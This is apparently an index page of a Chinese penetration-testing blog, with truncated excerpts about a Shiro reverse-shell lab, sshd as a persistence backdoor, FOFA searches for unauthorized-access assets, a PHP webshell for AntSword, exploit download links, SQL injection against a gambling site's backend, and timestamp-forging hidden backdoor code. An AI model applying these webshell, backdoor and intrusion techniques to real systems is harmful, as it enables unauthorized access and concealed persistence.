为了响应9.1新法规，日后更新和之前发的漏洞丶程序丶工具禁止下载使用。 所有的程序和工具请勿非法使用，否则后果自负。 [阅读全文]

环境： centos7 搭建漏洞环境 kali 接受反弹Shell 本机 进行shiro利用 过程： 使用docker环境，vulhub搭建漏洞 docker安装： 配置阿里云镜像源docker YUM # sudo yum install -y yum-utils device-mapper-persistent-data lvm2  # sudo yu [阅读全文]

利用场景： 控制目标机器，非交互环境下一键安装上sshd 服务， 即可远程控制，在内网渗透中作为权限维持横向移动后门岂不美哉？windows 新版本都带ssh客户端（Window 10 build 1809 and later or Windows Server 2019），哪个管理员会想到sshd 竟然是用来远控的呢？ SSH 优势： [阅读全文]

一、前言       很久以前就有一个想法，fofa通过目标ip和port来判断目标是否存活以及目标端口服务并反馈给用户，那我们是否可以根据fofa反馈的信息直接搜索未授权访问漏洞呢？今天又想起这件事来，于是便整理了下网上其他师傅总结的未授权漏洞，结合fofa共发现十个可以直接搜索未授权访问的资产。       语 [阅读全文]

php7.0以上不可使用 用蚁剑连接，选base64编码器   #php 7.0以下可用 #密码 _POST   蚁剑 base64编码 class Foo {     function Variable($c)     {         $ [阅读全文]

FastAdmin 默认不开启 感觉有点鸡叻   详细分析请看 https://mp.weixin.qq.com/s/gAerDNnDSl6864oyvDy4nA EXP链接：https://pan.baidu.com/s/1Z7heLqeghli8j4U3NOhy0g  提取码：cr7e  [阅读全文]

软件截图： 下载链接：https://share.weiyun.com/qpL7Bugg [阅读全文]

直接开始测试： 把后台抓出来 然后开始找漏洞，一般棋牌常见的漏洞就在各种搜索的位置，下面找到个注入 直接放入sqlmap 权限不高，就没继续深入，主要人太懒. [阅读全文]

一、中国蚁剑下载 唯一官方github下载地址：https://github.com/AntSwordProject/   注意：我们下载的时候需要下载两个部分，一个是项目核心源码”antSword“，另一个是加载器；加载器则分为三个版本：Mac、Windows、Linux。 [阅读全文]

自动化隐蔽后门实现： 这里我只是说下自己比较常用的一些点,我比较喜欢修改文件时间,然后写个比较常规的名字,然后用隐藏文件。 1 修改文件时间代码 // var_dump()); try { $file = scandir($_SERVER['DOCUMENT_ROOT']); foreach ($file as $name) { if(@filectime [阅读全文]